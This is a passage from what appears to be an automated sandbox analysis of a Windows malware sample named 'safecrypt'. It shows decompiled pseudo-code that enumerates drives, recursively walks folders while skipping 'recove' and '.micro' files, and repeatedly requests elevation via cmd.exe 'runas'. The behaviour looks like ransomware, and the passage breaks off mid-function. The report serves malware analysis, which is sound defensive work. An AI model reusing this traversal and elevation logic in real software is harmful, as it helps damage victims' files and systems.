                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0042C868,00000000,?,00000000,00000000,00000000,?,0042A8B7,00000001,00000214), ref: 0042E423
                      • Part of subcall function 00426D35: __getptd_noexit.LIBCMT ref: 00426D35
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap__getptd_noexit
                    • String ID:
                    • API String ID: 328603210-0
                    • Opcode ID: 7ceacb3bd7153f9d101443cf8f83e965562f2032ade726dfa4d45279d23e6cc9
                    • Instruction ID: 3048370fbd15864a2de75c7d1c5ff97586d4d0b22b8673ec9d9c2682b6d2bf7b
                    • Opcode Fuzzy Hash: 7ceacb3bd7153f9d101443cf8f83e965562f2032ade726dfa4d45279d23e6cc9
                    • Instruction Fuzzy Hash: 7B01B5313012359AEF28BF27FC04B673755AB91364F45853BA915CB291DB7898008659
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 25%
                    			E00428842(intOrPtr _a4) {
                    				void* __ebp;
                    				void* _t2;
                    				void* _t3;
                    				void* _t4;
                    				void* _t5;
                    				void* _t8;
                    
                    				_push(0);
                    				_push(0);
                    				_push(_a4);
                    				_t2 = E00428702(_t3, _t4, _t5, _t8); // executed
                    				return _t2;
                    			}









                    0x00428847
                    0x00428849
                    0x0042884b
                    0x0042884e
                    0x00428857

                    APIs
                    • _doexit.LIBCMT ref: 0042884E
                      • Part of subcall function 00428702: __lock.LIBCMT ref: 00428710
                      • Part of subcall function 00428702: RtlDecodePointer.NTDLL(0043A130,00000020,00428869,00000000,00000001,00000000,?,004288A9,000000FF,?,0042CD76,00000011,00000000,?,0042A822,0000000D), ref: 0042874C
                      • Part of subcall function 00428702: DecodePointer.KERNEL32(?,004288A9,000000FF,?,0042CD76,00000011,00000000,?,0042A822,0000000D), ref: 0042875D
                      • Part of subcall function 00428702: DecodePointer.KERNEL32(-00000004,?,004288A9,000000FF,?,0042CD76,00000011,00000000,?,0042A822,0000000D), ref: 00428783
                      • Part of subcall function 00428702: DecodePointer.KERNEL32(?,004288A9,000000FF,?,0042CD76,00000011,00000000,?,0042A822,0000000D), ref: 00428796
                      • Part of subcall function 00428702: DecodePointer.KERNEL32(?,004288A9,000000FF,?,0042CD76,00000011,00000000,?,0042A822,0000000D), ref: 004287A0
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: DecodePointer$__lock_doexit
                    • String ID:
                    • API String ID: 3343572566-0
                    • Opcode ID: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                    • Instruction ID: 410251afda8765797f56776bd077054fac49f1cf5a99ee80198f4435a3742b9e
                    • Opcode Fuzzy Hash: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                    • Instruction Fuzzy Hash: 01B0927268020833DA212982AC03F1A3A0987E0B64EA50025FA0C191A1A9A6A9618289
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RtlEncodePointer.NTDLL(00000000,0042D2A2,0043EAD0,00000314,00000000,?,?,?,?,?,00428A0D,0043EAD0,Microsoft Visual C++ Runtime Library,00012010), ref: 0042A757
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: EncodePointer
                    • String ID:
                    • API String ID: 2118026453-0
                    • Opcode ID: e8bd5948ff0ba12d8d763c2ef6712d4ab9fee5624a4f549d056d68599dfc5c06
                    • Instruction ID: 55457e734866364b10becd5164e672ba337638dfa2f33bdc9a848ead0b38efeb
                    • Opcode Fuzzy Hash: e8bd5948ff0ba12d8d763c2ef6712d4ab9fee5624a4f549d056d68599dfc5c06
                    • Instruction Fuzzy Hash:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    APIs
                    • GetVersionExW.KERNEL32 ref: 0041CC2A
                    • LoadLibraryW.KERNEL32(ADVAPI32.DLL), ref: 0041CC3B
                    • LoadLibraryW.KERNEL32(KERNEL32.DLL), ref: 0041CC46
                    • LoadLibraryW.KERNEL32(NETAPI32.DLL), ref: 0041CC4F
                    • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 0041CC67
                    • GetProcAddress.KERNEL32(00000000,NetApiBufferFree), ref: 0041CC73
                    • FreeLibrary.KERNEL32(00000000), ref: 0041CD35
                    • GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 0041CD4D
                    • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 0041CD5B
                    • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 0041CD6B
                    • FreeLibrary.KERNEL32(?), ref: 0041CE4D
                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0041CE63
                    • GetProcAddress.KERNEL32(00000000,CloseToolhelp32Snapshot), ref: 0041CE6F
                    • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0041CE7B
                    • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 0041CE87
                    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0041CE93
                    • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 0041CE9F
                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0041CEAB
                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0041CEB7
                    • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 0041CEC3
                    • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0041CECF
                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0041CEDB
                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0041CEE7
                    • GetTickCount.KERNEL32 ref: 0041CF81
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.328930565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000002.328968362.0000000000482000.00000040.00000001.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$Library$Load$Free$CountTickVersion
                    • String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next
                    • API String ID: 548066447-715222291
                    • Opcode ID: b9021eb9554bb8b5bd5fac215fcbf1c3fad1c07227abf969bd0ecfe80a0513a8
                    • Instruction ID: e325c2c0c16efb651a2c9cc273a3c738e8a9eef4192e713dfe2993f8c5413f84
                    • Opcode Fuzzy Hash: b9021eb9554bb8b5bd5fac215fcbf1c3fad1c07227abf969bd0ecfe80a0513a8
                    • Instruction Fuzzy Hash: AFF16271A443419BD720DF65DC85B9BBBF8AF88704F04492EF588D2290DBB8D984CB5A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 75%
                    			E0041EB60() {
                    				signed int _v8;
                    				char _v528;
                    				short _v1048;
                    				char _v2088;
                    				struct _SHELLEXECUTEINFOW _v2148;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t24;
                    				long _t31;
                    				void* _t46;
                    				void* _t59;
                    				void* _t61;
                    				signed int _t63;
                    
                    				_t24 =  *0x43d01c; // 0xe0063daa
                    				_v8 = _t24 ^ _t63;
                    				E0042C770( &_v2088, 0, 0x410);
                    				E0042C770( &_v1048, 0, 0x208);
                    				_t56 =  &_v528;
                    				E0042C770( &_v528, 0, 0x208);
                    				_t31 = GetEnvironmentVariableW(L"windir",  &_v1048, 0x208);
                    				if(_t31 != 0 && _t31 <= 0x208) {
                    					_t56 =  &_v2088;
                    					if(E0041EAF0(0x410,  &_v2088, L"%s\\system32\\cmd.exe",  &_v1048) == 0) {
                    						_push(_t61);
                    						E00426210( &_v528, 0x104, L"/c start \"\" \"");
                    						E00425AA2( &_v528, 0x104, 0x46a450);
                    						E00425AA2( &_v528, 0x104, "\"");
                    						E0042C770( &_v2148, 0, 0x3c);
                    						_v2148.cbSize = 0x3c;
                    						_v2148.lpVerb = L"runas";
                    						_v2148.lpFile =  &_v2088;
                    						_v2148.lpParameters =  &_v528;
                    						_v2148.nShow = 0;
                    						_v2148.fMask = 0x40;
                    						if(ShellExecuteExW( &_v2148) == 0) {
                    							_push(_t46);
                    							_push(_t59);
                    							while(GetLastError() == 0x4c7) {
                    								Sleep(0x3e8);
                    								if(ShellExecuteExW( &_v2148) == 0) {
                    									continue;
                    								}
                    								break;
                    							}
                    							_pop(_t59);
                    							_pop(_t46);
                    						}
                    						_t56 = _v2148.hProcess;
                    						CloseHandle(_v2148.hProcess);
                    						_pop(_t61);
                    					}
                    				}
                    				return E004256D3(1, _t46, _v8 ^ _t63, _t56, _t59, _t61);
                    			}

















                    0x0041eb69
                    0x0041eb70
                    0x0041eb81
                    0x0041eb94
                    0x0041eb9e
                    0x0041eba7
                    0x0041ebc0
                    0x0041ebc8
                    0x0041ebe0
                    0x0041ebfb
                    0x0041ec01
                    0x0041ec13
                    0x0041ec29
                    0x0041ec3f
                    0x0041ec4f
                    0x0041ec70
                    0x0041ec7a
                    0x0041ec84
                    0x0041ec8a
                    0x0041ec90
                    0x0041ec9a
                    0x0041eca8
                    0x0041ecaa
                    0x0041ecb1
                    0x0041ecb8
                    0x0041ecc6
                    0x0041ecd3
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0041ecd3
                    0x0041ecd5
                    0x0041ecd6
                    0x0041ecd6
                    0x0041ecd7
                    0x0041ecde
                    0x0041ece4
                    0x0041ece4
                    0x0041ebfb
                    0x0041ecf7

                    APIs
                    • _memset.LIBCMT ref: 0041EB81
                    • _memset.LIBCMT ref: 0041EB94
                    • _memset.LIBCMT ref: 0041EBA7
                    • GetEnvironmentVariableW.KERNEL32(windir,?,00000208), ref: 0041EBC0
                      • Part of subcall function 0041EAF0: _vsnwprintf.NTDLL ref: 0041EB1F
                    • _memset.LIBCMT ref: 0041EC4F
                    • ShellExecuteExW.SHELL32(?), ref: 0041ECA4
                    • GetLastError.KERNEL32 ref: 0041ECB8
                    • Sleep.KERNEL32(000003E8), ref: 0041ECC6
                    • ShellExecuteExW.SHELL32(0000003C), ref: 0041ECCF
                    • CloseHandle.KERNEL32(?), ref: 0041ECDE
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.328930565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000002.328968362.0000000000482000.00000040.00000001.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memset$ExecuteShell$CloseEnvironmentErrorHandleLastSleepVariable_vsnwprintf
                    • String ID: %s\system32\cmd.exe$/c start "" "$<$@$runas$windir
                    • API String ID: 3370961082-322324821
                    • Opcode ID: fd6f5a003a4712941eb55314001929a588cf7b7a701bd01644bda6015d4e8651
                    • Instruction ID: fbc655fe99c80366fce70685c54fda4c900a0abb96979987ed020d9a5d484dfe
                    • Opcode Fuzzy Hash: fd6f5a003a4712941eb55314001929a588cf7b7a701bd01644bda6015d4e8651
                    • Instruction Fuzzy Hash: 0D31E0B5A4031C97DB10D762DC45FDA73B8BF44704F5045DAB608A61C1EB789A848FDC
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 90%
                    			E00413AD0(intOrPtr* _a4, intOrPtr _a8) {
                    				signed int _v8;
                    				char _v8202;
                    				short _v8204;
                    				char _v16394;
                    				char _v16396;
                    				struct _WIN32_FIND_DATAW _v16988;
                    				void* _v16992;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t55;
                    				intOrPtr* _t71;
                    				char* _t85;
                    				char* _t86;
                    				intOrPtr* _t88;
                    				intOrPtr* _t92;
                    				intOrPtr* _t93;
                    				intOrPtr* _t94;
                    				intOrPtr* _t102;
                    				intOrPtr _t110;
                    				intOrPtr* _t114;
                    				intOrPtr* _t115;
                    				intOrPtr _t116;
                    				intOrPtr* _t118;
                    				intOrPtr* _t119;
                    				intOrPtr* _t120;
                    				void* _t128;
                    				void* _t131;
                    				signed int _t133;
                    				void* _t134;
                    				void* _t138;
                    				void* _t139;
                    				void* _t142;
                    				void* _t144;
                    
                    				E0042DFB0(0x425c);
                    				_t55 =  *0x43d01c; // 0xe0063daa
                    				_v8 = _t55 ^ _t133;
                    				_t102 = _a4;
                    				_v8204 = 0;
                    				E0042C770( &_v8202, 0, 0x1ffe);
                    				_v16396 = 0;
                    				E0042C770( &_v16394, 0, 0x1ffe);
                    				E00426210( &_v8204, 0x1000, _t102);
                    				_t124 =  &_v8204;
                    				E00425AA2( &_v8204, 0x1000, L"\\*.*");
                    				_t138 = _t134 + 0x30;
                    				_t131 = FindFirstFileW( &_v8204,  &_v16988);
                    				_v16992 = _t131;
                    				if(_t131 != 0xffffffff) {
                    					do {
                    						if((_v16988.dwFileAttributes & 0x00000010) == 0) {
                    							if(_a8 == 1) {
                    								E00426210( &_v8204, 0x1000, _t102);
                    								E00425AA2( &_v8204, 0x1000, "\\");
                    								E00425AA2( &_v8204, 0x1000,  &(_v16988.cFileName));
                    								_t71 =  &(_v16988.cFileName);
                    								_t142 = _t138 + 0x24;
                    								_t124 = _t71 + 2;
                    								do {
                    									_t110 =  *_t71;
                    									_t71 = _t71 + 2;
                    								} while (_t110 != 0);
                    								_t130 = (_t71 - _t124 >> 1) + 1;
                    								_t132 = E00426273( &(_v16988.cFileName));
                    								E00426123(_t75, (_t71 - _t124 >> 1) + 1);
                    								_t144 = _t142 + 0xc;
                    								if(E00413A60(L"recove", _t75) == 0 && E00413A60(L".micro", _t132) == 0 && E004142C0(_t132) == 1) {
                    									E00413E70( &_v8204);
                    								}
                    								E004258B8(_t132);
                    								_t131 = _v16992;
                    								goto L55;
                    							}
                    						} else {
                    							_t114 =  &(_v16988.cFileName);
                    							_t85 = ".";
                    							while(1) {
                    								_t124 =  *_t85;
                    								if(_t124 !=  *_t114) {
                    									break;
                    								}
                    								if(_t124 == 0) {
                    									L7:
                    									_t85 = 0;
                    								} else {
                    									_t16 =  &(_t85[2]); // 0x2e0000
                    									_t124 =  *_t16;
                    									if(_t124 !=  *((intOrPtr*)(_t114 + 2))) {
                    										break;
                    									} else {
                    										_t85 =  &(_t85[4]);
                    										_t114 = _t114 + 4;
                    										if(_t124 != 0) {
                    											continue;
                    										} else {
                    											goto L7;
                    										}
                    									}
                    								}
                    								L9:
                    								if(_t85 != 0) {
                    									_t115 =  &(_v16988.cFileName);
                    									_t86 = L"..";
                    									while(1) {
                    										_t124 =  *_t86;
                    										if(_t124 !=  *_t115) {
                    											break;
                    										}
                    										if(_t124 == 0) {
                    											L15:
                    											_t86 = 0;
                    										} else {
                    											_t19 =  &(_t86[2]); // 0x2e
                    											_t124 =  *_t19;
                    											if(_t124 !=  *((intOrPtr*)(_t115 + 2))) {
                    												break;
                    											} else {
                    												_t86 =  &(_t86[4]);
                    												_t115 = _t115 + 4;
                    												if(_t124 != 0) {
                    													continue;
                    												} else {
                    													goto L15;
                    												}
                    											}
                    										}
                    										L17:
                    										if(_t86 != 0) {
                    											E00426210( &_v8204, 0x1000, _t102);
                    											_t88 = _t102;
                    											_t139 = _t138 + 0xc;
                    											_t22 = _t88 + 2; // 0x44023a
                    											_t128 = _t22;
                    											do {
                    												_t116 =  *_t88;
                    												_t88 = _t88 + 2;
                    											} while (_t116 != 0);
                    											if(_t88 - _t128 >> 1 > 3) {
                    												E00425AA2( &_v8204, 0x1000, "\\");
                    												_t139 = _t139 + 0xc;
                    											}
                    											E00425AA2( &_v8204, 0x1000,  &(_v16988.cFileName));
                    											_t138 = _t139 + 0xc;
                    											_t118 =  &_v8204;
                    											_t92 = 0x476450;
                    											while(1) {
                    												_t124 =  *_t92;
                    												if(_t124 !=  *_t118) {
                    													break;
                    												}
                    												if(_t124 == 0) {
                    													L27:
                    													_t92 = 0;
                    												} else {
                    													_t124 =  *((intOrPtr*)(_t92 + 2));
                    													if(_t124 !=  *((intOrPtr*)(_t118 + 2))) {
                    														break;
                    													} else {
                    														_t92 = _t92 + 4;
                    														_t118 = _t118 + 4;
                    														if(_t124 != 0) {
                    															continue;
                    														} else {
                    															goto L27;
                    														}
                    													}
                    												}
                    												L29:
                    												if(_t92 != 0) {
                    													_t119 =  &_v8204;
                    													_t93 = 0x478450;
                    													while(1) {
                    														_t124 =  *_t93;
                    														if(_t124 !=  *_t119) {
                    															break;
                    														}
                    														if(_t124 == 0) {
                    															L35:
                    															_t93 = 0;
                    														} else {
                    															_t124 =  *((intOrPtr*)(_t93 + 2));
                    															if(_t124 !=  *((intOrPtr*)(_t119 + 2))) {
                    																break;
                    															} else {
                    																_t93 = _t93 + 4;
                    																_t119 = _t119 + 4;
                    																if(_t124 != 0) {
                    																	continue;
                    																} else {
                    																	goto L35;
                    																}
                    															}
                    														}
                    														L37:
                    														if(_t93 != 0) {
                    															_t120 =  &_v8204;
                    															_t94 = 0x47a450;
                    															while(1) {
                    																_t124 =  *_t94;
                    																if(_t124 !=  *_t120) {
                    																	break;
                    																}
                    																if(_t124 == 0) {
                    																	L43:
                    																	_t94 = 0;
                    																} else {
                    																	_t124 =  *((intOrPtr*)(_t94 + 2));
                    																	if(_t124 !=  *((intOrPtr*)(_t120 + 2))) {
                    																		break;
                    																	} else {
                    																		_t94 = _t94 + 4;
                    																		_t120 = _t120 + 4;
                    																		if(_t124 != 0) {
                    																			continue;
                    																		} else {
                    																			goto L43;
                    																		}
                    																	}
                    																}
                    																L45:
                    																if(_t94 != 0) {
                    																	E00413AD0( &_v8204, _a8);
                    																	_t124 =  &_v8204;
                    																	E00426210( &_v16396, 0x1000,  &_v8204);
                    																	_t144 = _t138 + 0x14;
                    																	E004134E0( &_v16396);
                    																	L55:
                    																	_t138 = _t144 + 4;
                    																}
                    																goto L56;
                    															}
                    															asm("sbb eax, eax");
                    															asm("sbb eax, 0xffffffff");
                    															goto L45;
                    														}
                    														goto L56;
                    													}
                    													asm("sbb eax, eax");
                    													asm("sbb eax, 0xffffffff");
                    													goto L37;
                    												}
                    												goto L56;
                    											}
                    											asm("sbb eax, eax");
                    											asm("sbb eax, 0xffffffff");
                    											goto L29;
                    										}
                    										goto L56;
                    									}
                    									asm("sbb eax, eax");
                    									asm("sbb eax, 0xffffffff");
                    									goto L17;
                    								}
                    								goto L56;
                    							}
                    							asm("sbb eax, eax");
                    							asm("sbb eax, 0xffffffff");
                    							goto L9;
                    						}
                    						L56:
                    					} while (FindNextFileW(_t131,  &_v16988) != 0);
                    					_t64 = FindClose(_t131);
                    				}
                    				return E004256D3(_t64, _t102, _v8 ^ _t133, _t124, _t130, _t131);
                    			}





































                    0x00413ad8
                    0x00413add
                    0x00413ae4
                    0x00413ae8
                    0x00413afc
                    0x00413b03
                    0x00413b1a
                    0x00413b21
                    0x00413b36
                    0x00413b43
                    0x00413b4f
                    0x00413b54
                    0x00413b6b
                    0x00413b6d
                    0x00413b76
                    0x00413b7c
                    0x00413b83
                    0x00413d63
                    0x00413d76
                    0x00413d8f
                    0x00413daa
                    0x00413daf
                    0x00413db5
                    0x00413db8
                    0x00413dc0
                    0x00413dc0
                    0x00413dc3
                    0x00413dc6
                    0x00413dcf
                    0x00413de1
                    0x00413de5
                    0x00413dea
                    0x00413dfb
                    0x00413e1f
                    0x00413e1f
                    0x00413e25
                    0x00413e2a
                    0x00000000
                    0x00413e2a
                    0x00413b89
                    0x00413b89
                    0x00413b8f
                    0x00413b94
                    0x00413b94
                    0x00413b9a
                    0x00000000
                    0x00000000
                    0x00413b9f
                    0x00413bb6
                    0x00413bb6
                    0x00413ba1
                    0x00413ba1
                    0x00413ba1
                    0x00413ba9
                    0x00000000
                    0x00413bab
                    0x00413bab
                    0x00413bae
                    0x00413bb4
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00413bb4
                    0x00413ba9
                    0x00413bbf
                    0x00413bc1
                    0x00413bc7
                    0x00413bcd
                    0x00413bd2
                    0x00413bd2
                    0x00413bd8
                    0x00000000
                    0x00000000
                    0x00413bdd
                    0x00413bf4
                    0x00413bf4
                    0x00413bdf
                    0x00413bdf
                    0x00413bdf
                    0x00413be7
                    0x00000000
                    0x00413be9
                    0x00413be9
                    0x00413bec
                    0x00413bf2
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00413bf2
                    0x00413be7
                    0x00413bfd
                    0x00413bff
                    0x00413c12
                    0x00413c17
                    0x00413c19
                    0x00413c1c
                    0x00413c1c
                    0x00413c20
                    0x00413c20
                    0x00413c23
                    0x00413c26
                    0x00413c32
                    0x00413c45
                    0x00413c4a
                    0x00413c4a
                    0x00413c60
                    0x00413c65
                    0x00413c68
                    0x00413c6e
                    0x00413c73
                    0x00413c73
                    0x00413c79
                    0x00000000
                    0x00000000
                    0x00413c7e
                    0x00413c95
                    0x00413c95
                    0x00413c80
                    0x00413c80
                    0x00413c88
                    0x00000000
                    0x00413c8a
                    0x00413c8a
                    0x00413c8d
                    0x00413c93
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00413c93
                    0x00413c88
                    0x00413c9e
                    0x00413ca0
                    0x00413ca6
                    0x00413cac
                    0x00413cb1
                    0x00413cb1
                    0x00413cb7
                    0x00000000
                    0x00000000
                    0x00413cbc
                    0x00413cd3
                    0x00413cd3
                    0x00413cbe
                    0x00413cbe
                    0x00413cc6
                    0x00000000
                    0x00413cc8
                    0x00413cc8
                    0x00413ccb
                    0x00413cd1
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00413cd1
                    0x00413cc6
                    0x00413cdc
                    0x00413cde
                    0x00413ce4
                    0x00413cea
                    0x00413cf0
                    0x00413cf0
                    0x00413cf6
                    0x00000000
                    0x00000000
                    0x00413cfb
                    0x00413d12
                    0x00413d12
                    0x00413cfd
                    0x00413cfd
                    0x00413d05
                    0x00000000
                    0x00413d07
                    0x00413d07
                    0x00413d0a
                    0x00413d10
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00413d10
                    0x00413d05
                    0x00413d1b
                    0x00413d1d
                    0x00413d2e
                    0x00413d33
                    0x00413d46
                    0x00413d4b
                    0x00413d55
                    0x00413e30
                    0x00413e30
                    0x00413e30
                    0x00000000
                    0x00413d1d
                    0x00413d16
                    0x00413d18
                    0x00000000
                    0x00413d18
                    0x00000000
                    0x00413cde
                    0x00413cd7
                    0x00413cd9
                    0x00000000
                    0x00413cd9
                    0x00000000
                    0x00413ca0
                    0x00413c99
                    0x00413c9b
                    0x00000000
                    0x00413c9b
                    0x00000000
                    0x00413bff
                    0x00413bf8
                    0x00413bfa
                    0x00000000
                    0x00413bfa
                    0x00000000
                    0x00413bc1
                    0x00413bba
                    0x00413bbc
                    0x00000000
                    0x00413bbc
                    0x00413e33
                    0x00413e41
                    0x00413e4a
                    0x00413e4a
                    0x00413e60

                    APIs
                    • _memset.LIBCMT ref: 00413B03
                    • _memset.LIBCMT ref: 00413B21
                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00413A39,00440238,00000001), ref: 00413B65
                    • __wcsdup.LIBCMT ref: 00413DD9
                    • _free.LIBCMT ref: 00413E25
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00413E3B
                    • FindClose.KERNEL32(00000000), ref: 00413E4A
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.328930565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000002.328968362.0000000000482000.00000040.00000001.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File_memset$CloseFirstNext__wcsdup_free
                    • String ID: .micro$PdG$\*.*$recove
                    • API String ID: 2758342554-1331407425
                    • Opcode ID: 55a62152aad37145335be79b4ad95aee0eb702fd5b6f2d6ef0c43730368e7e43
                    • Instruction ID: dd8138aa41fdac96c58e9b2fc9b18e225616ef6c43d0bb4751995cb4fe1b2c04
                    • Opcode Fuzzy Hash: 55a62152aad37145335be79b4ad95aee0eb702fd5b6f2d6ef0c43730368e7e43
                    • Instruction Fuzzy Hash: F6913972A0021566DB20EF609C42BEB3335AF24755F4045E6F909A6282F779EFC8C78C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E00413860() {
                    				signed int _v8;
                    				short _v1036;
                    				char _v1234;
                    				short _v1236;
                    				short _v1238;
                    				intOrPtr _v1242;
                    				intOrPtr _v1246;
                    				intOrPtr _v1250;
                    				intOrPtr _v1254;
                    				short _v1256;
                    				long _v1260;
                    				long _v1264;
                    				long _v1268;
                    				signed int _t35;
                    				intOrPtr _t38;
                    				WCHAR* _t45;
                    				WCHAR* _t46;
                    				int _t47;
                    				WCHAR* _t51;
                    				signed int _t53;
                    				WCHAR* _t55;
                    				intOrPtr* _t60;
                    				intOrPtr* _t61;
                    				short _t63;
                    				short _t64;
                    				short _t65;
                    				short _t67;
                    				short _t68;
                    				short* _t71;
                    				short _t72;
                    				short _t73;
                    				WCHAR* _t75;
                    				intOrPtr* _t76;
                    				long _t78;
                    				signed int _t79;
                    				signed int _t81;
                    				void* _t82;
                    				void* _t83;
                    				void* _t92;
                    
                    				_t81 = (_t79 & 0xfffffff8) - 0x4f4;
                    				_t35 =  *0x43d01c; // 0xe0063daa
                    				_v8 = _t35 ^ _t81;
                    				E004233B0(0x4401f8, 3);
                    				_t38 =  *0x43fed0; // 0x0
                    				_t78 = 0;
                    				_t82 = _t81 + 8;
                    				if( *((intOrPtr*)(_t38 + 4)) == 0) {
                    					L36:
                    					ExitThread(1);
                    				}
                    				GetLogicalDriveStringsW(0x100,  &_v1036);
                    				_t75 =  &_v1036;
                    				_v1236 = 0;
                    				E0042C770( &_v1234, 0, 0xc6);
                    				_t83 = _t82 + 0xc;
                    				_v1256 = 0;
                    				_v1254 = 0;
                    				_v1250 = 0;
                    				_v1246 = 0;
                    				_v1242 = 0;
                    				_v1238 = 0;
                    				_v1268 = 0;
                    				_v1264 = 0;
                    				_v1260 = 0;
                    				if(_v1036 == 0) {
                    					L33:
                    					E00413760(_t78);
                    					if( *0x440184 <= _t78) {
                    						goto L36;
                    					}
                    					_t76 = 0x440238;
                    					do {
                    						E00413AD0(_t76, 1);
                    						_t78 = _t78 + 1;
                    						_t83 = _t83 + 8;
                    						_t76 = _t76 + 0x800;
                    					} while (_t78 <  *0x440184);
                    					goto L36;
                    				} else {
                    					do {
                    						_t60 = L"A:\\";
                    						_t45 = _t75;
                    						while(1) {
                    							_t67 =  *_t45;
                    							if(_t67 !=  *_t60) {
                    								break;
                    							}
                    							if(_t67 == _t78) {
                    								L8:
                    								_t45 = 0;
                    								L10:
                    								_t46 = _t75;
                    								if(_t45 != _t78) {
                    									_t61 = L"B:\\";
                    									while(1) {
                    										_t68 =  *_t46;
                    										if(_t68 !=  *_t61) {
                    											break;
                    										}
                    										if(_t68 == _t78) {
                    											L19:
                    											_t46 = 0;
                    											L21:
                    											if(_t46 != _t78) {
                    												_t47 = GetDriveTypeW(_t75);
                    												if(_t47 == 3 || _t47 == 4 || _t47 == 2) {
                    													if(GetVolumeInformationW(_t75,  &_v1236, 0xc8,  &_v1268,  &_v1264,  &_v1260,  &_v1256, 0x14) == 1) {
                    														E00413AD0(_t75, _t50);
                    														_t83 = _t83 + 8;
                    													}
                    												}
                    												_t51 = _t75;
                    												_t71 =  &(_t51[1]);
                    												do {
                    													_t63 =  *_t51;
                    													_t51 =  &(_t51[1]);
                    												} while (_t63 != _t78);
                    												goto L32;
                    											}
                    											_t55 = _t75;
                    											_t71 =  &(_t55[1]);
                    											do {
                    												_t64 =  *_t55;
                    												_t55 =  &(_t55[1]);
                    											} while (_t64 != _t78);
                    											goto L32;
                    										}
                    										_t72 = _t46[1];
                    										if(_t72 !=  *((intOrPtr*)(_t61 + 2))) {
                    											break;
                    										}
                    										_t46 =  &(_t46[2]);
                    										_t61 = _t61 + 4;
                    										if(_t72 != _t78) {
                    											continue;
                    										}
                    										goto L19;
                    									}
                    									asm("sbb eax, eax");
                    									asm("sbb eax, 0xffffffff");
                    									goto L21;
                    								}
                    								_t71 =  &(_t46[1]);
                    								do {
                    									_t65 =  *_t46;
                    									_t46 =  &(_t46[1]);
                    								} while (_t65 != _t78);
                    								goto L32;
                    							}
                    							_t73 = _t45[1];
                    							if(_t73 !=  *((intOrPtr*)(_t60 + 2))) {
                    								break;
                    							}
                    							_t45 =  &(_t45[2]);
